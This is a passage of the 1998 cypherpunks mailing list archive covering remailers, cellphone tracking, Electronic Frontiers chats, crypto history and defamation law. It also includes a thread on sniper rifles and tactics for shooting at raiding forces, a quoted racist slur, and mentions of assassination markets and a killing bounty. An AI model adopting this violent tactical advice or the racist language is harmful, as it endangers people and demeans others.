From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Antonomasia <ant@notatla.demon.co.uk>
Date: Thu, 1 Jan 1998 19:33:28 +0800
To: cypherpunks@ssz.com
Subject: HIP97 photos & hate speech in list opinions
Message-ID: <199801010104.BAA04808@notatla.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain



Cpunks (and Bcc list),

I've had a kind offer from Judith to scan my HIP photos and
display them on the web (www.sabotage.org).  This should happen
in a few days.  The photos include Alex, Judith, DDT, Ulf, Ian Grigg,
Lucky, Sameer, Joichi and others.



Re: Hate speech and censorship, 22 Dec, Anonymous

> On behalf of the non-racist cypherpunks, please accept an apology for
> Paul Bradley's racist message:

> > uneducated and foolish arabs such as Parekh should stick 
> > to what they do best: running kebab shops and/or selling cheap fake rolex 
> > watches to tourists. 

> This does not reflect the mainstream view on the list.  ....

I found Sameer perfectly pleasant.  IMO the best view to take on
mainstream views is that you can't usually tell.  Silence could indicate
killfiles rather than assent.



--
##############################################################
# Antonomasia   ant@notatla.demon.co.uk                      #
# See http://www.notatla.demon.co.uk/                        #
##############################################################





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Miller <dm0@avana.net>
Date: Thu, 1 Jan 1998 13:26:17 +0800
To: cypherpunks@Algebra.COM
Subject: Re: Location Escrow anyone ?
In-Reply-To: <199801010433.XAA16928@users.invweb.net>
Message-ID: <34AB3639.296E74E9@avana.net>
MIME-Version: 1.0
Content-Type: text/plain



William H. Geiger III wrote:
> 
>>ZURICH (December 28, 1997 4:12 p.m. EST http://www.nando.net) - Swiss
>>police have secretly tracked the whereabouts of mobile phone users via a
>>telephone company computer that records billions of movements going back
>>more than half a year, a Sunday newspaper reported.
> 
> Don't be fooled that this is a swiss only problem. It's being done here
> in Amerika right now.

You betcha.  A couple of years ago, there was a _tremendous_ need for
programmers to produce "cellular accounting/billing" software in Atlanta
in preparation for the Olympics.  However, apparently the Olympic Park
bomber was not carrying a cellular at the time, so alas, another crime
has gone unsolved...  

Gee, I wonder which carrier Ted Kaczynski will be doing wireless
endorsements for?

--David Miller

middle  rival
devil rim lad

Windows '95 -- a dirty, two-bit operating system.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Costner" <pooh@efga.org>
Date: Thu, 1 Jan 1998 15:17:10 +0800
To: cypherpunks@Algebra.COM
Subject: IRC Internet chat with Electronic Frontiers
Message-ID: <3.0.3.32.19980101021332.0369ef2c@rboc.net>
MIME-Version: 1.0
Content-Type: text/plain



I sent this message to the cypherpunks list (cyberpass) about 12 hours ago,
but have not seen it come up, so I'm sending it again.  My apologies if you
get two copies.  (this copy does have more listed at the bottom in the
schedule.)

There will be a series of IRC internet chats with Electronic Frontiers.  We
wish to address two main problems.  The Electronic Frontiers movement is
misunderstood by a lot of people, and there is not enough communication
between the independent EF organizations.

The idea was sparked by the recent Cypherpunks Christmas Eve chat.  Thanks
for the idea.  The members of the cypherpunks mail list are invited to our
upcoming internet chats.  Dates and info are below.  

The Electronic Frontiers movement is several independent organizations that
share a common thread to their name.  Each group speaks for themselves and
are not associated with each other.  The various EF organizations have no
association with the group called EFF.  We are grassroots organizations of
concerned citizens of our geographic areas, volunteering our time and
energy.  EF organizations exist in several US states and in different
countries around the world.  EF organizations have been responsible for
activities such as winning court cases like the Georgia Internet Anonymity
and web linking lawsuit, and the anti-spoofing spam lawsuit in Texas
(flowers.com).

Of particular interest to Cypherpunks is the fact that EFGA hosts a variety
of cypherpunk technologies, including a Cypherpunk Type-1 remailer,
nymserver, and mixmaster remailer.  We also have a PGP keyserver.  Recently
we created an FTP archive of privacy software.  So far this has been front
ends for remailers and PGP software that various software authors have sent
us to host.

All you need is an IRC client, and to log onto EFnet.  If you have
questions on how to do this, ask the list.  I'm a newbie with IRC and can't
help that much.  The first chat is Thursday, tomorrow, New Years day at
7:00 pm New York time.

-------------

There will be an IRC internet chat session for Electronic Frontiers.  More
info can be found at http://www.efga.org/about/meeting.html

Get out your IRC client and visit us on EFnet IRC in the
#ElectronicFrontiers channel.  There will be a chat session on 

  * Thursday, January 1, 1998 at 7:00pm EST 
    hosted by Robert Costner of Electronic Frontiers Georgia.

  * Saturday, January 3, 1998 at 3:00pm EST
    hosted by Scott Brower of Electronic Frontiers Florida.

  * Wednesday, January 7, 1998 at 5:00 EST (2:00pm Pacific)
    hosted by Jon Lebkowsky of EF-Texas

  * To be announced
    hosted by Electronic Frontiers Australia (EFA)

These will be our first chat sessions.  After we see how this goes, we will
try to setup something on a regular basis.


  -- Robert Costner                  Phone: (770) 512-8746
     Electronic Frontiers Georgia    mailto:pooh@efga.org  
     http://www.efga.org/            run PGP 5.0 for my public key





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Thu, 1 Jan 1998 22:38:09 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Long-distance limits on Bells unconstitutional [CNN]
Message-ID: <199801011456.IAA11379@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

>    Federal judge says long-distance
>    restrictions on Bells unconstitutional
>    
>    December 31, 1997: 7:02 p.m. ET
>    
>    SBC Communications
>    More related sites... WASHINGTON (Reuters) - A federal judge Wednesday
>    threw out as unconstitutional provisions of a landmark federal law
>    that restrict the regional Baby Bells from entering the $80 billion
>    long-distance telephone market, SBC Communications Inc. said.
>    [INLINE] San Antonio-based SBC said U.S. District Judge Joe Kendall
>    sided with the carrier, which had charged that the Telecommunications
>    Act of 1996 was unconstitutional because it discriminated against SBC
>    and the other four Baby Bells.
>    [INLINE] The New Year's Eve ruling is expected to send shock waves
>    through the telecom industry and throw into further disarray the
>    Federal Communications Commission's efforts to break open the $100
>    billion local phone market controlled by the Bells.

[text deleted]


    ____________________________________________________________________
   |                                                                    |
   |      Those who make peaceful revolution impossible will make       |
   |      violent revolution inevitable.                                |
   |                                                                    |
   |                                          John F. Kennedy           |
   |                                                                    |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mix <mixmaster@remail.obscura.com>
Date: Fri, 2 Jan 1998 03:32:22 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199801011858.KAA07272@sirius.infonex.com>
MIME-Version: 1.0
Content-Type: text/plain



Okay, I'd like to set up a remailer - but I don't know where to start! Unfortunatly it's going to have to run on an NT 4.0 box, so the winsock remailer is out of the question, right? And I'm not in the US, so I can't use the juno stuff -- so what (if anything) *can* I use?

Thanks for any help...









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Fri, 2 Jan 1998 03:23:23 +0800
To: Julian Assange <cypherpunks@toad.com
Subject: Re: Jim Bell... lives... on... in... Hollywood!
In-Reply-To: <wxbtxwbh5n.fsf@polysynaptic.iq.org>
Message-ID: <v03102801b0d19a2fc3b6@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



At 2:52 AM -0800 1/1/98, Julian Assange wrote:
>Anyone noticed this before?
>
>------- Start of forwarded message -------
>Date: 1 Jan 1998 09:54:51 -0000
>Message-ID: <19980101095451.25998.qmail@suburbia.net>
>From: proff@suburbia.net
>To: proff@suburbia.net
>Subject:home.html
>
>
>
>                           Scoop the Grim Reaper!
>
>                               Who will live?
>
>                               Who will die?

Yeah, a few people pointed this out when Bell's "Assassination Politics"
stuff began hitting the CP list, circa fall of 1995.

--Tim May

The Feds have shown their hand: they want a ban on domestic cryptography
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^2,976,221   | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Fri, 2 Jan 1998 03:38:42 +0800
To: cypherpunks@Algebra.COM
Subject: Re: Guns: H&K, G3, 7.62 v 5.56 [Guns]
In-Reply-To: <tw7btxwc9qx.fsf@the-great-machine.mit.edu>
Message-ID: <v03102802b0d19c0832e1@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



An interesting message (well, interesting to me and perhaps to some others).


At 10:47 AM -0800 1/1/98, Ryan Lackey wrote:


>Thus, in defending against a raid, Soviet-style weapons are probably better.
>7.62x54R Dra----v rifles are probably a good model -- iirc (I've never
>fired one), they're semi auto bullpups.  [eeek, www.guns.ru is selling them
>with bayonets!  tactical close range sniping, aye!].  Or the SEAL sniper

I've read some reviews of the Dragunov which are very unflattering. The
scope on standard USSR-used rifles was terrible. I could doublecheck what
Plaster says about them, but I haven't seen anyone advocating that
Americans use them. Maybe they'll become the wave of the future...

>weapon -- an accurized M14, which is basically an M1A.  With a good scope
>and better trigger, an M14/M1A can be 1 MOA, and it's a real battle rifle,
>with the ability to engage multiple targets quickly due to the semi-auto
>action.

Actually, I figure that if I'm ever in a situation where I have to engage
multiple targets quickly, I'm probably a goner. If nothing else, they'll
roll an armored vehicle in (and more and more SWAT teams have them) and
burn me out, Waco-style.

("We had to burn the children in order to save the children. Save them from
what? Well, we had reports of something....")

>Also, when you're operating without a spotter/security man, it's nice to
>have the ability to quickly kill anyone in close.  With an M1A, you just move
>from your concealment, kill, and return, wasting a minimum of time.  I guess
>in a home you could just keep an AR-15 next to you for such close-in dealings,
>though.

Yeah, I think an AR-15 (or variant, of course) makes more sense for the
average person than anything else (incl. shotgun) for home defense.
Opinions vary on this, but this is my conclusion.


>you are going to have to move around the house, at least.  A PSG-1 ends
>up being cheaper than 10 match-grade Remington 700s -- besides, the scope
>is much more expensive than the gun anyway (perhaps I just like overly
>expensive scopes)

Well, I could justify buying _one_ Remington 700, for $600, plus another
$400 or so for the Leupold scope (not bought yet). But I sure as hell
couldn't justify buying a $10K PSG-1!!!

>*ObCrypto!*:
>The choice of cryptographic tools is somewhat like the choice of sniper
>weaponry.

...

Nice parallels, though I tend to argue for crypto in terms of speech and
First Amendment grounds, and avoid the (obvious, but dangerous) comparisons
of crypto to firearms.

Dangerous because one immediately runs into the "But we regulate machine
guns, so if crypto is like a machine gun, why shouldn't it be regulated?"
And "We don't let citizens have nuclear weapons, so why let them have
military-grade unbreakable ciphers?"

The speech issues and prior restraint issues are much cleaner.

--Tim May

The Feds have shown their hand: they want a ban on domestic cryptography
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^2,976,221   | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Fri, 2 Jan 1998 02:32:33 +0800
To: cypherpunks@cyberpass.net
Subject: Peter Huber on the Orwellian Falacy
Message-ID: <v04002718b0d17bc36f1a@[139.167.130.249]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


X-Sender: oldbear@pop.tiac.net
Date: Wed, 31 Dec 1997 15:09:58 -0500
To: Digital Commerce Society of Boston <dcsb@ai.mit.edu>
From: The Old Bear <oldbear@arctos.com>
Subject: Peter Huber on the Orwellian Falacy
Mime-Version: 1.0
Sender: bounce-dcsb@ai.mit.edu
Precedence: bulk
Reply-To: The Old Bear <oldbear@arctos.com>


   HIGH-TECH'S LIBERATING EFFECT

   As the Internet makes inroads into information-restrictive nations,
   such as China, efforts to limit access to only "desirable" ideas
   are doomed to failure, say experts.

   "The complaint one hears against the Internet isn't that there is
   too little speech," says Manhattan Institute analyst Peter Huber.
   "Instead, the argument is that there is too much hateful or
   pornographic speech.

   Stalin manipulated the past, altering photos and just wiping
   people and events out of the historical record.  But today,
   documents and photos get downloaded and stored in files all over
   the world.  You can make corrupt copies, false copies, but you
   can't erase real copies now."

   Huber, author of the book "Orwell's Revenge," applauds the move
   by industry to make encryption products widely available:  "It
   means that we can now create a zone of privacy that the government
   can't penetrate.  That's the exact opposite of what Orwell through
   would happen."

   source: Investor's Business Daily
           December 30, 1997
           as summarized by Edupage



For help on using this list (especially unsubscribing), send a message to
"dcsb-request@ai.mit.edu" with one line of text: "help".

--- end forwarded text



-----------------
Robert Hettinga (rah@shipwright.com), Philodox
e$, 44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'
The e$ Home Page: http://www.shipwright.com/
Ask me about FC98 in Anguilla!: <http://www.fc98.ai/>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ? the Platypus {aka David Formosa} <dformosa@st.nepean.uws.edu.au>
Date: Thu, 1 Jan 1998 11:08:00 +0800
To: The Sheriff <sheriff@speakeasy.org>
Subject: Re: [Anon newsgroup posting "censorship"]
In-Reply-To: <l03020901b0d02e107212@[209.130.134.60]>
Message-ID: <Pine.LNX.3.93.980101123050.138B-100000@shirley>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

On Wed, 31 Dec 1997, The Sheriff wrote:

> Date: Wed, 31 Dec 1997 13:19:58 -0400
> From: The Sheriff <sheriff@speakeasy.org>
> To: cypherpunks@toad.com
> Subject: Re: [Anon newsgroup posting "censorship"]
> 
> [snip]
> 
> >My cancelled Usenet article offered a reward for killing the spammer:
[...]
> It's not censorship, you idiot.  The dude who clipped out your post
> was trying to keep some fucking psycho from killing somebody else for
> some imagined (or not, who knows?) $50k reward.
> 
> It's common sense, in other words.

Not realy,

Post it to one unnmoderated newsgroup      Canceling it would be rouge
Post it to one moderated newsgroup         Moderator may cancel it
Post it to more then 20 newsgroups         Anyone can cancel it as spam

The post was canceled because the moderator can canel anything in there
newsgroup.  It is censorship, but by posting to a moderated newsgroup you
are concenting to that censorship.

- -- 
Please excuse my spelling as I suffer from agraphia see the url in my header. 
Never trust a country with more peaple then sheep.  ex-net.scum and proud
You Say To People "Throw Off Your Chains" And They Make New Chains For
Themselves? --Terry Pratchett.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv

iQCVAwUBNKry9qQK0ynCmdStAQGQyQQAniVlZhPkrx/sk5HvduXR0c1iUs9ZyVZZ
ncXkjREeMJFAjnL4FEtACji0KdtQqFZ1meGYJ33EVDK2SUmYKNVa0RZebK53C6Gw
YJot1jnkSMU5MHDqRX25kqqSBSmyX/IML0KZbh6D9NTV+iOF4qos5B016RdsG43f
1FW67ogq0qI=
=nXjj
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Fri, 2 Jan 1998 03:05:30 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Guns: H&K, G3, 7.62 v 5.56 [Guns] (fwd)
Message-ID: <199801011919.NAA11887@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Subject: Re: Guns: H&K, G3, 7.62 v 5.56 [Guns]
> From: Ryan Lackey <rdl@mit.edu>
> Date: 01 Jan 1998 13:47:02 -0500

> 2) In my (somewhat limited) experience, many field-improvised concealment
> locations are great during firing, but when you move to cycle the action
> on a bolt action rifle, you make the concealment shake or otherwise reveal
> yourself.  Against a force with sniper/antisniper weaponry, that will likely

> All that being said, for field use and home defense, if I'm alone, I'd
> take a barrett .50 browning for long-range USMC-style scout-sniping, or

You obviously haven't seen the flash or the dust cloud from one of these
beasties fired from ground level. Hiding at anything less than a mile is not
something you're going to do very well.


    ____________________________________________________________________
   |                                                                    |
   |      Those who make peaceful revolution impossible will make       |
   |      violent revolution inevitable.                                |
   |                                                                    |
   |                                          John F. Kennedy           |
   |                                                                    |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ryan Lackey <rdl@mit.edu>
Date: Fri, 2 Jan 1998 02:58:42 +0800
To: Tim May <tcmay@got.net>
Subject: Re: Guns: H&K, G3, 7.62 v 5.56 [Guns]
Message-ID: <tw7btxwc9qx.fsf@the-great-machine.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain



Tim May <tcmay@got net> continues the sniping discussion:

>I haven't seen Jim's reaction to my point about bolt-action rifles still
>being far and away the favored weapon for sniping. Neither an AR-15 variant
>nor an HK variant are advised for long-range shots (though either will of
>course be capable of such shots...it's just that one wants the absolute
>best precsion, and cycling rate is largely immaterial).

In a rich target environment where you're firing from concealment, I think it 
is better to have a semiauto 7.62mmN rifle such as an accurized  HK91 or a 
national match M1A, assuming the enemy has snipers or long-range antisniper
weaponry.  Why?

1) It is likely to be a target rich environment.  USMC sniper doctrine is
mainly single target single kill attacks from outside 600 yards.  Former
Soviet and US Army snipers mainly engaged multiple targets inside that
range for tactical support.  Defending against a raid is primarily
tactical support sniping, killing the vice president of a country other than
the US is primarily USMC style scout/sniping.

Thus, in defending against a raid, Soviet-style weapons are probably better.
7.62x54R Dra----v rifles are probably a good model -- iirc (I've never
fired one), they're semi auto bullpups.  [eeek, www.guns.ru is selling them
with bayonets!  tactical close range sniping, aye!].  Or the SEAL sniper
weapon -- an accurized M14, which is basically an M1A.  With a good scope
and better trigger, an M14/M1A can be 1 MOA, and it's a real battle rifle,
with the ability to engage multiple targets quickly due to the semi-auto
action.

Also, when you're operating without a spotter/security man, it's nice to
have the ability to quickly kill anyone in close.  With an M1A, you just move
from your concealment, kill, and return, wasting a minimum of time.  I guess
in a home you could just keep an AR-15 next to you for such close-in dealings,
though.

2) In my (somewhat limited) experience, many field-improvised concealment
locations are great during firing, but when you move to cycle the action
on a bolt action rifle, you make the concealment shake or otherwise reveal
yourself.  Against a force with sniper/antisniper weaponry, that will likely
bring down a hail of fire, which is suboptimal at best.  USMC snipers generally
solve this by firing once and leaving, since it's confusing and hard to
localize on a single gunshot, but in a target rich environment, you might
not be able to move.  And they may have you surrounded, so it's hard
to move without being seen.

3) A semi-auto is generally more useful for non-sniping tasks.  I can barely
carry an M1A, spare ammo, supplies, etc. for a couple days without being
annoyed at the weight -- I sure wouldn't want to add a SMG or assault carbine
to that.  I would not have a problem with using a battle rifle/sniper rifle
against a force armed with assault carbines and SMGs, though.

True, this may be less of an issue inside a house, since you could just leave
all your supplies cached throughout.  I still thing you need to remain 
concealed and hopefully in cover, and if they bring heavy weapons to bear,
you are going to have to move around the house, at least.  A PSG-1 ends
up being cheaper than 10 match-grade Remington 700s -- besides, the scope
is much more expensive than the gun anyway (perhaps I just like overly
expensive scopes)


All that being said, for field use and home defense, if I'm alone, I'd
take a barrett .50 browning for long-range USMC-style scout-sniping, or
antimateriel sniping, and either a PSG-1 if money is no object (it's not
*that* expensive, if you actually use it), or the German Army sniping
system (or my^H^Ha national match M1A or M14) if money is only somewhat
an object, or a Dragunov if money is a limiting factor, for anti-sniping
or support sniping.  And I strongly feel anti-raid sniping is of the
latter category.

(True, your gun is the best 7.62 USMC-style rifle other than the PSG-1..)

Even better than that would be the addition of a spotter/security person
with an M16 :)  And some nice *cover* for where you fire from, in the form
of earth, concrete, sandbags, or Spectra.  And if the sky is the limit,
something to engage light armor, like a 20mm rifle or tactical air support :)



*ObCrypto!*:
The choice of cryptographic tools is somewhat like the choice of sniper
weaponry.

A OTP is remarkably like a bolt-action rifle of infinite accuracy.  Say, a 
USAF prototype 20mm laser guided sniper rifle.  Use it twice in the
same place, and get slagged in automatic cannon fire.  However, it is ideal
for "one shot one kill" perfect secrecy.

A steganographically-protected data stream is much like a silenced
subsonic carbine.

A remailer network is much like a remote electrically-fired weapon (someone
at a pistol match tried this with a free pistol, won, and the technique
was banned the next year :)

PGP is the PSS -- pretty [good] sniping system, pretty good precision.  
Useful for a lot of things, and since it's one of the better tools, it 
gets used for a lot of things where another solution might be better. :)

Of course, I'd be kind of biased to call a working Eternity implementation
and/or working and distributed digital cash system the PSG-1.
-- 
Ryan Lackey
rdl@mit.edu
http://mit.edu/rdl/		





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@Algebra.COM (Igor Chudov @ home)
Date: Fri, 2 Jan 1998 04:00:22 +0800
To: devnull@www.video-collage.com
Subject: Re: Guns: H&K, G3, 7.62 v 5.56 [Guns]
In-Reply-To: <v03102802b0d19c0832e1@[207.167.93.63]>
Message-ID: <199801011948.NAA17459@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text



Tim May wrote:
> >Thus, in defending against a raid, Soviet-style weapons are probably better.
> >7.62x54R Dra----v rifles are probably a good model -- iirc (I've never
> >fired one), they're semi auto bullpups.  [eeek, www.guns.ru is selling them
> >with bayonets!  tactical close range sniping, aye!].  Or the SEAL sniper
> 
> I've read some reviews of the Dragunov which are very unflattering. The
> scope on standard USSR-used rifles was terrible. I could doublecheck what
> Plaster says about them, but I haven't seen anyone advocating that
> Americans use them. Maybe they'll become the wave of the future...

First of all, the standard Dragunov scopes use weird Russian batteries
that are hard to find here. (the batteries are only used to light the
crosshairs). Also, I have been told that Dragunovs are not as accurate as
M1As (2MOA or so).

What I do like about SVD is their mean looks. Maybe it is my Soviet taste.

	- Igor.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Costner" <pooh@efga.org>
Date: Fri, 2 Jan 1998 03:30:43 +0800
To: Jim Choate <ravage@ssz.com>
Subject: Re: IRC Internet chat with Electronic Frontiers (fwd)
In-Reply-To: <199712312107.PAA09410@einstein.ssz.com>
Message-ID: <3.0.3.32.19980101141316.0362f05c@mail.atl.bellsouth.net>
MIME-Version: 1.0
Content-Type: text/plain



At 03:07 PM 12/31/97 -0600, Jim Choate wrote:
>Forwarded message:
>
>> Date: Wed, 31 Dec 1997 15:06:46 -0500
>> From: "Robert A. Costner" <pooh@efga.org>
>> Subject: IRC Internet chat with Electronic Frontiers
>
>>   * To be announced
>>     hosted by Jon Lebkowsky of EF-Texas
>
>Woah Nelly, this is the first I have heard of EF-Tx, got any contact info?

There have always been two groups in Texas, one in Austin, and one in
Houston, I think.  Austin is of course the famous home of the Steve Jackson
raids.  Rumor has it that the two groups are merging into one to be called
something similar to EF-Texas.  If you want more info, you'll have to get
it from Jon Lebkowsky, Gene Crick, or one of the others in Texas.  I'm sure
Jon will address this during his chat.

Hopefully we'll have the text of the chat session, or at least the first
hour, on a web page after the chat.  Jon's chat session will be on
Wednesday, January 7, 1998 at 7:00 EST (5:00pm Pacific)

The session hosted by EF Australia should be Saturday, January 17, 1998 at
8:00pm EST (11:00am Sunday, Brisbane, AU), Hosted by Greg Taylor of
Electronic Frontiers Australia.  (maybe 7:00 EST - it is not set in stone)

To be honest, I'm getting confused on the time zones.  Today I noticed a
mistake I made earlier when I added when I should have subtracted.  Plus I
haven't figured out Australia and GMT time yet, to do it without thinking.
More info about times, and hopefully any corrections can be found at

	http://www.efga.org/about/meeting.html


  -- Robert Costner                  Phone: (770) 512-8746
     Electronic Frontiers Georgia    mailto:pooh@efga.org  
     http://www.efga.org/            run PGP 5.0 for my public key





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@invweb.net>
Date: Fri, 2 Jan 1998 04:56:36 +0800
To: Steve Schear <schear@lvdi.net>
Subject: Re: Mobile phones used as trackers
In-Reply-To: <v03102808b0d0b5632db7@[208.129.55.202]>
Message-ID: <199801012054.PAA25297@users.invweb.net>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

In <v03102808b0d0b5632db7@[208.129.55.202]>, on 12/31/97 
   at 06:53 PM, Steve Schear <schear@lvdi.net> said:

>and keep your cell phone turned off.

It is my understanding that they can still track you with the cell phone
turned off so long as there is power going to the box (most auto cell
phones are hardwired into the cars electrical system).

- -- 
- ---------------------------------------------------------------
William H. Geiger III  http://users.invweb.net/~whgiii
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 2.6.3a at: http://users.invweb.net/~whgiii/pgpmr2.html                        
- ---------------------------------------------------------------

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a-sha1
Charset: cp850
Comment: Registered_User_E-Secure_v1.1b1_ES000000

iQCVAwUBNKwA+o9Co1n+aLhhAQG15gP/eG3w/i4L2HjWlacroj7BWLWZYgjoOWdn
yNxmvrOPQGSrrTBCO28dn3xOvJfz4z87G918h7pRZvxmhElNsHEbqCSK2CqsUCnZ
ahfF/aiXMm59ToF1HMMRXgpCxORORC58GxOkIR5zUp7HKjpPc6KhEdARovBfYnJM
LcxS2kcOJ+4=
=aljX
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Fri, 2 Jan 1998 04:39:59 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: W.F. Friedman - A reputation revisited?...
Message-ID: <199801012057.OAA12379@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Hi,

Thought I would pass an interesting quote along regarding Friedman. I think
it may have some interest considering the holding of Friedman by some
cpunks...

Combined Fleet Decoded: The secret history of American intelligence and the
                        Japanese navy in WWII
John Prados
ISBN 0-679-43701-0


pp. 164

"This is not to say the solution occurred in a vacuum, however. It was
OP-20-G that had solved Red, predecessor to the new diplomatic system,
and Commander Safford recognized that his organization needed outside help
on Purple. He went to his Army counterpart, The Signal Intelligence Service
(SIS), which formed part of the Signal Corps: there, senior cryptanalyst
William F. Friedman, was an expert on machine based encipherment systems.
Under Friedman, chief of the team attacking the B Machine would be Frank B.
Rowlett. Other SIS cryptanalysts, an electronics engineer, accounting
machine experts, and Japanese linguist formed the rest of the group.
Friedman, too often given credit as the man who "broke" Purple, made only
sporadic contributions amid other duties. His main role came in selecting
members of Rowlett's team, with an assist on diagnosis and analysis of the
sytsem. Robert O. Ferner was Rowlett's second, with cryptanalysts Genevieve
Grotjan, Albert W. Small, and Samuel S. Snyder plus crytographic specialists
Glenn S. Landig, Kenneth D. Miller, and Cyrus C. Sturgis Jr. The top
Japanese linguist was John B. Hurt, a Virginian like Rowlett himself."


    ____________________________________________________________________
   |                                                                    |
   |      Those who make peaceful revolution impossible will make       |
   |      violent revolution inevitable.                                |
   |                                                                    |
   |                                          John F. Kennedy           |
   |                                                                    |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kent Crispin <kent@songbird.com>
Date: Fri, 2 Jan 1998 07:21:29 +0800
To: cypherpunks@toad.com
Subject: Re: Jim Bell... lives... on... in... Hollywood!
In-Reply-To: <wxbtxwbh5n.fsf@polysynaptic.iq.org>
Message-ID: <19980101150542.36875@songbird.com>
MIME-Version: 1.0
Content-Type: text/plain



On Thu, Jan 01, 1998 at 09:52:20PM +1100, Julian Assange wrote:
> 
> Anyone noticed this before?

No.  But there are two obvious differences between this and the Bell 
plan:  1) it's not anon; 2) you are explicitly barred from winning if 
you contribute in any way to the death.
[...]
>     You will not receive credit for a death if you somehow contribute to
>    that person's demise. If there's any dispute over the exact date of a
>     celebrity's demise, information listed on the death certificate will
>                                   prevail.
>                                       
>     Dewey's Death Pool is open to residents of the 50 United States and
>       the District of Columbia who are 18 years or older. For complete
>                        rules, see the Official Rules.

So you have to provide proof of age to claim...
[...]

-- 
Kent Crispin				"No reason to get excited",
kent@songbird.com			the thief he kindly spoke...
PGP fingerprint:   B1 8B 72 ED 55 21 5E 44  61 F4 58 0F 72 10 65 55
http://songbird.com/kent/pgp_key.html





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rights@super.zippo.com
Date: Fri, 2 Jan 1998 08:47:46 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Defamation of the goverment
Message-ID: <199801020044.QAA06595@super.zippo.com>
MIME-Version: 1.0
Content-Type: text/plain




>
>In the U. S. a public figure must show actual malice and reckless
disregard
>for truth to recover damages for defamation.
>But how does this
apply to the
>goverment itself, the president, and to a foreign
goverment?
>Seditious speech
>against the U. S. goverment is protected under
Brandenburg v. Ohio
>But what if
>for instance a Singaporian or German citizen
uses a remailer in California to
>insult the head of state, the goverment or
the rulingparty at home?
>Would
>willfully promotion of falsehood about a
foreign goverment or a foreign
>goverment institution be protected
speech?
>Could the Singaporian or German
>head of state or any goverment
institution within these countries recover
>damages for defamation committed
in the U.S. through a local SP?
>As far I
>understand it, there is two matters
of relevance.
